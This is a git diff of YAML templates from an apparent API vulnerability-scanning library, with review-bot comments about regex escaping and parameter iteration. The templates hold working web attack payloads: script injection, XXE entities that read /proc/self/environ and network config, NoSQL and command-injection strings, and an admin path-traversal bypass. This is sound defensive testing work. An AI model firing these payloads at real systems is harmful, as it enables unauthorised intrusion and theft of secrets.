@@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -90,9 +90,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -119,9 +121,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat output.txt" + ${changed_body_key}: "cat output.txt" + for_each_combination: true - modify_query_param: - changed_query_key: "cat output.txt" + ${changed_query_key}: "cat output.txt" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml b/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml index 029957fbb..7da86f9d5 100644 --- a/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml +++ b/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value 
@@ -90,9 +90,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -119,9 +121,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat output.txt" + ${changed_body_key}: "cat output.txt" + for_each_combination: true - modify_query_param: - changed_query_key: "cat output.txt" + ${changed_query_key}: "cat output.txt" + for_each_combination: true - validate: response_payload: length: diff --git a/Cross-Site-Scripting/BasicXSSDELETE.yml b/Cross-Site-Scripting/BasicXSSDELETE.yml index 79b913221..f0ace55d9 100644 --- a/Cross-Site-Scripting/BasicXSSDELETE.yml +++ b/Cross-Site-Scripting/BasicXSSDELETE.yml @@ -46,15 +46,16 @@ api_selection_filters: for_one: key: regex: .* - extract: body_param_key + extractMultiple: body_param_key execute: type: single requests: - req: - modify_body_param: - body_param_key: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + ${body_param_key}: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + for_each_combination: true validate: response_payload: contains_all: diff --git a/Cross-Site-Scripting/BasicXSSPATCH.yml b/Cross-Site-Scripting/BasicXSSPATCH.yml index 661f6c7f1..eec9659f3 100644 --- a/Cross-Site-Scripting/BasicXSSPATCH.yml +++ b/Cross-Site-Scripting/BasicXSSPATCH.yml 
@@ -46,15 +46,16 @@ api_selection_filters: for_one: key: regex: .* - extract: body_param_key + extractMultiple: body_param_key execute: type: single requests: - req: - modify_body_param: - body_param_key: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + ${body_param_key}: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + for_each_combination: true validate: response_payload: contains_all: diff --git a/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml b/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml index 60d2eae3a..386c3f782 100644 --- a/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml +++ b/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -91,8 +91,9 @@ execute: requests: - req: - modify_header: - userKey: ${XSSPayloads} + ${userKey}: ${XSSPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml b/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml index 3d2af1b8c..d777a9f67 100644 --- a/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml +++ b/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml 
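Review bot: The value filter in HTTPHeaderInjectionIPXSS.yml (context of the `@@ -74,7 +74,7 @@` hunk) is a double-quoted YAML scalar that begins and ends with `\b`, which YAML double-quoted escaping reads as a backspace character, not a regex word boundary; the dots in the same string are correctly written as `\\.`. As written the pattern would require a literal backspace on each side of the address, so the filter likely never matches a real IP value and the template selects nothing without reporting an error. Write both boundaries as `\\b`, or move the pattern into single quotes with single backslashes. The commit leaves this line unchanged, and the same regex is in HTTPHeaderInjectionIncorrectIP.yml and HTTPHeaderInjectionObfuscatedIP.yml.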
@@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -95,8 +95,9 @@ execute: requests: - req: - modify_header: - userKey: ${IPPayloads} + ${userKey}: ${IPPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml b/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml index 2c213717f..16d6e7a0e 100644 --- a/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml +++ b/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml 
@@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -94,8 +94,9 @@ execute: requests: - req: - modify_header: - userKey: ${IPPayloads} + ${userKey}: ${IPPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml b/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml index 93323615a..d19683c03 100644 --- a/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml +++ b/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml @@ -76,7 +76,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value execute: @@ -84,7 +84,8 @@ execute: requests: - req: - modify_body_param: - changed_body_key: !!str ${changed_body_value} && 'a' != 'a' && 'a' != 'a + ${changed_body_key}: !!str ${changed_body_value} && 'a' != 'a' && 'a' != 'a + for_each_combination: true - validate: or: - response_code: 
@@ -117,7 +118,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: !!str ${changed_body_value} || 'a' == 'a' || 'a + ${changed_body_key}: !!str ${changed_body_value} || 'a' == 'a' || 'a + for_each_combination: true - validate: response_code: gte: 200 @@ -148,7 +150,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_body_param: - changed_body_key: !!str ${changed_body_value} || 'a' == 'a' || 'a + ${changed_body_key}: !!str ${changed_body_value} || 'a' == 'a' || 'a + for_each_combination: true - validate: response_payload: eq_obj: "${x2.response.body}" diff --git a/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml b/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml index 5af386742..61ca833ba 100644 --- a/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml +++ b/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -86,6 +86,7 @@ execute: - delete_query_param: ${changed_query_key} - add_query_param: ${changed_query_key}: !!str ${changed_query_value};return false; + for_each_combination: true - validate: or: - and: @@ -121,6 +122,7 @@ execute: - delete_query_param: ${changed_query_key} - add_query_param: ${changed_query_key}: !!str ${changed_query_value} || 'a' == 'a' || 'a' == 'a' + for_each_combination: true - validate: response_code: gte: 200 @@ -154,6 +156,7 @@ execute: - delete_query_param: ${changed_query_key} - add_query_param: ${changed_query_key}: !!str ${changed_query_value} || '1' == '1' || '1' == '1' + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml b/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml index f8b1465f7..9f9c4fddd 100644 --- a/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml 
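Review bot: In NoSQLiBooleanBasedQueryParamJS.yml the three execute hunks (`@@ -86,6 +86,7 @@`, `@@ -121,6 +122,7 @@`, `@@ -154,6 +156,7 @@`) add `for_each_combination: true` under `add_query_param` only, while the preceding `delete_query_param: ${changed_query_key}` step is unchanged. With `changed_query_key` now filled by `extractMultiple`, the diff does not show which key the delete step resolves to. A request could therefore remove one parameter and re-add a different one, or carry both the original and the injected value for the same name. Please confirm that the delete step iterates in lockstep with the add step and record that next to it, for example `# NOTE: must resolve to the same key as add_query_param below`.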
+++ b/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value diff --git a/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml b/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml index a483deb51..29c23f762 100644 --- a/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml +++ b/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml @@ -77,7 +77,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: regex: .* extract: changed_body_value @@ -133,7 +133,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${changed_body_value}${timeBasedPayloads} + ${changed_body_key}: ${changed_body_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml b/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml index 6c41e227c..c9b66d211 100644 --- a/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml +++ b/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: regex: .* extract: changed_body_value @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${changed_body_value}${timeBasedPayloads} + ${changed_body_key}: ${changed_body_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml b/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml index a8c940d81..58ca374b6 100644 --- a/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml +++ b/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml 
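Review bot: NoSQLiBooleanBasedQueryParamRegex.yml switches the key filter to `extractMultiple: changed_query_key`, but no request step in it gains `for_each_combination: true`, unlike the other files in this part of the commit. The execute section is outside the hunk, so I cannot tell whether it already iterates. If it does not, the template may test only one key or substitute a list where a single name is expected. Add `for_each_combination: true` under the step that uses `${changed_query_key}`, or state in the commit message why this file differs.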
@@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: regex: .* extract: changed_body_value @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${changed_body_value}${timeBasedPayloads} + ${changed_body_key}: ${changed_body_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml b/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml index ec27bf2cb..ce83ea09d 100644 --- a/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml +++ b/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_query_param: - changed_query_key: ${changed_query_value}${timeBasedPayloads} + ${changed_query_key}: ${changed_query_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/XXECustomDocumentTypeDefinition.yml b/Injection-Attacks/XXECustomDocumentTypeDefinition.yml index c072c304a..e01531d0e 100644 --- a/Injection-Attacks/XXECustomDocumentTypeDefinition.yml +++ b/Injection-Attacks/XXECustomDocumentTypeDefinition.yml @@ -74,7 +74,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -91,6 +91,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: length: diff --git a/Injection-Attacks/XXEErrorBasedTest.yml b/Injection-Attacks/XXEErrorBasedTest.yml index 8f2ce57f4..bb56bb9bc 100644 --- a/Injection-Attacks/XXEErrorBasedTest.yml +++ b/Injection-Attacks/XXEErrorBasedTest.yml 
@@ -72,7 +72,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -88,6 +88,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: and: - response_payload: diff --git a/Injection-Attacks/XXEInternalFileDisclosure.yml b/Injection-Attacks/XXEInternalFileDisclosure.yml index 579763ca1..1ade294b9 100644 --- a/Injection-Attacks/XXEInternalFileDisclosure.yml +++ b/Injection-Attacks/XXEInternalFileDisclosure.yml @@ -74,7 +74,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^(\\w+):(\\$[0-9]\\$[^:]+):(\\d+):(\\d+):(\\d+):(\\d*):(\\d*):(\\d*):$" diff --git a/Injection-Attacks/XXELFI.yml b/Injection-Attacks/XXELFI.yml index 3dbd91457..5319b93b4 100644 --- a/Injection-Attacks/XXELFI.yml +++ b/Injection-Attacks/XXELFI.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -89,6 +89,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) - ([a-zA-Z0-9_-]*) \\[([^\\]]+)\\] \"(GET|POST|HEAD|PUT|DELETE|OPTIONS) ([^\"]+)\" (\\d{3}) (\\d+)" diff --git a/Injection-Attacks/XXEParameterEntityFileDisclosure.yml b/Injection-Attacks/XXEParameterEntityFileDisclosure.yml index 061261c98..3b4ba581e 100644 --- a/Injection-Attacks/XXEParameterEntityFileDisclosure.yml +++ b/Injection-Attacks/XXEParameterEntityFileDisclosure.yml 
@@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -89,6 +89,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Injection-Attacks/XXEPathTraversal.yml b/Injection-Attacks/XXEPathTraversal.yml index 09a3aff63..0442df8bc 100644 --- a/Injection-Attacks/XXEPathTraversal.yml +++ b/Injection-Attacks/XXEPathTraversal.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml b/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml index fb7ff13d6..ad8b35936 100644 --- a/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml +++ b/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Injection-Attacks/XXEReadEnvVar.yml b/Injection-Attacks/XXEReadEnvVar.yml index 9eb5b0503..2d5894f87 100644 --- a/Injection-Attacks/XXEReadEnvVar.yml +++ b/Injection-Attacks/XXEReadEnvVar.yml 
@@ -79,12 +79,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: payloads: - "%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fproc%2Fself%2Fenviron%22%3E%5D%3E%3Cuser%3E%3Cname%3E%26xxe%3B%3C%2Fname%3E%3C%2Fuser%3E" @@ -93,9 +93,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${payloads} + ${changed_body_key}: ${payloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${payloads} + ${changed_query_key}: ${payloads} + for_each_combination: true validate: response_payload: regex: '(\w+=[\w\/\.\-:]+)(?:\0\w+=[\w\/\.\-:]+)*' diff --git a/Injection-Attacks/XXERevealNetworkConfig.yml b/Injection-Attacks/XXERevealNetworkConfig.yml index f5c3dd0a4..bd5afd885 100644 --- a/Injection-Attacks/XXERevealNetworkConfig.yml +++ b/Injection-Attacks/XXERevealNetworkConfig.yml @@ -76,12 +76,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: payloads: - "%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20%25%20custom%20SYSTEM%20%5C%22file%3A%2F%2F%2Fetc%2Fnetwork%2Finterfaces%5C%22%3E%20%25custom%3B%5D%3E" @@ -91,9 +91,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${payloads} + ${changed_body_key}: ${payloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${payloads} + ${changed_query_key}: ${payloads} + for_each_combination: true validate: response_payload: contains_all: diff --git a/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml b/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml index 9c0e75901..87a7947be 100644 --- a/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml 
+++ b/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "<(config|configuration|settings)>.+" diff --git a/Injection-Attacks/XXEServerInformationLeak.yml b/Injection-Attacks/XXEServerInformationLeak.yml index 259ccaa50..6c07b49e4 100644 --- a/Injection-Attacks/XXEServerInformationLeak.yml +++ b/Injection-Attacks/XXEServerInformationLeak.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: and: - response_payload: diff --git a/Injection-Attacks/XXESoapAPICredentialsExposure.yml b/Injection-Attacks/XXESoapAPICredentialsExposure.yml index 046d1c427..3dba9c8a2 100644 --- a/Injection-Attacks/XXESoapAPICredentialsExposure.yml +++ b/Injection-Attacks/XXESoapAPICredentialsExposure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -100,6 +100,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "(DB_USER|DB_PASSWORD|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|username|password|CLIENT_ID|CLIENT_SECRET|aws_access_key_id|aws_secret_access_key)\\s*[:=]\\s*[\\w/+=@.-]+" diff --git a/Injection-Attacks/XXESoapAPILogFileDisclosure.yml b/Injection-Attacks/XXESoapAPILogFileDisclosure.yml index edfdf0dc2..84af8f9bf 100644 
--- a/Injection-Attacks/XXESoapAPILogFileDisclosure.yml +++ b/Injection-Attacks/XXESoapAPILogFileDisclosure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -100,6 +100,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}|[A-Z]+\\s+\\[\\w+\\].+\\d{4}/\\d{2}/\\d{2} \\d{2}:\\d{2}:\\d{2}\\.\\d{3}|(\\[.*\\] \\[.*\\] \\[client \\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\])|\\b[A-Z]+\\b \\d{1,2} \\d{2}:\\d{2}:\\d{2} \\w+ \\w+\\[\\d+\\]:" diff --git a/Injection-Attacks/XXEURLEncoded.yml b/Injection-Attacks/XXEURLEncoded.yml index 6086dde7f..74260f2e3 100644 --- a/Injection-Attacks/XXEURLEncoded.yml +++ b/Injection-Attacks/XXEURLEncoded.yml @@ -72,7 +72,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -89,6 +89,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Input-Validation/BalanceCalculationHandling.yml b/Input-Validation/BalanceCalculationHandling.yml index 49ce924a6..c3923dced 100644 --- a/Input-Validation/BalanceCalculationHandling.yml +++ b/Input-Validation/BalanceCalculationHandling.yml @@ -81,7 +81,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -158,7 +158,8 @@ execute: requests: - req: - modify_body_param: - userKey: "${failValues}" + ${userKey}: "${failValues}" + for_each_combination: true - validate: response_code: gte: 200 
@@ -177,7 +178,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${passValues}" + ${userKey}: "${passValues}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml b/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml index d9b0a7e65..2eb782782 100644 --- a/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml +++ b/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml @@ -93,8 +93,9 @@ execute: - req: - modify_url: regex_replace: - regex: admin + regex: ${probableInputParameters} replace_with: "%2e%2e%2fadmin" + for_each_combination: true - remove_auth_header: true - validate: response_code: diff --git a/Input-Validation/BypassInputalidationWithNullValues.yml b/Input-Validation/BypassInputalidationWithNullValues.yml index e869cbe06..f943513f2 100644 --- a/Input-Validation/BypassInputalidationWithNullValues.yml +++ b/Input-Validation/BypassInputalidationWithNullValues.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -144,7 +144,8 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: ${userVal}${nullValues} + ${userKey}: ${userVal}${nullValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassRateLimitWithInvalidData.yml b/Input-Validation/BypassRateLimitWithInvalidData.yml index f4304ae40..faa7f7581 100644 --- a/Input-Validation/BypassRateLimitWithInvalidData.yml +++ b/Input-Validation/BypassRateLimitWithInvalidData.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey wordLists: probableInputParameters: @@ -170,7 +170,8 @@ execute: # attack attempts -1 - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 
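Review bot: In the `modify_url` step of BypassAdminRestrictionsViaURLEncoding.yml, `regex` is now driven by `${probableInputParameters}` while `replace_with` still hard-codes `"%2e%2e%2fadmin"`, so every wordlist entry is rewritten to the same admin path whatever it matched. The wordlist is defined outside this hunk; if it holds anything other than the admin segment, the test no longer checks what its name says, and entries are interpreted as regular expressions rather than literals. I would add a comment above the step, `# probableInputParameters entries are regexes; each match is replaced by ../admin`, or keep `regex: admin` if only that segment is meant.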
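Review bot: `${userKey}: ${userVal}${nullValues}` in BypassInputalidationWithNullValues.yml pairs a key that is now collected with `extractMultiple` with a value still captured by plain `extract: userVal` (filter hunk at -75,7). If more than one body key matches, the same `userVal` may be appended to keys it did not come from, so the request would no longer be "original value plus null suffix" for each field. The engine's binding rules are not visible here, so this is a question rather than a confirmed bug; a comment such as `# userVal is the value of one matched key; confirm it tracks ${userKey} per combination` would record the assumption. The same pairing appears in HeaderInvalidValues.yml, ImproperCharacterHandling.yml, ImproperFloatPointHandling.yml, InputValidationByReplacingParamWithArray.yml and PayloadKeysInvalidValues.yml.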
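Review bot: Every attempt step in BypassRateLimitWithInvalidData.yml (this hunk and the nine that follow for the same file) now sets `for_each_combination: true` on a key captured with `extractMultiple`, which may turn one attempt into one request per matched key. For a rate-limit test the number of requests per step is part of what is measured, so a fan-out would shift the point at which the limit is expected to trigger. Whether a step expands that way depends on the engine, which is not shown; I would state the intent next to the first step, e.g. `# one request per matched key and value; attempt counts assume this`. The `execute` block starts and ends outside these hunks.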
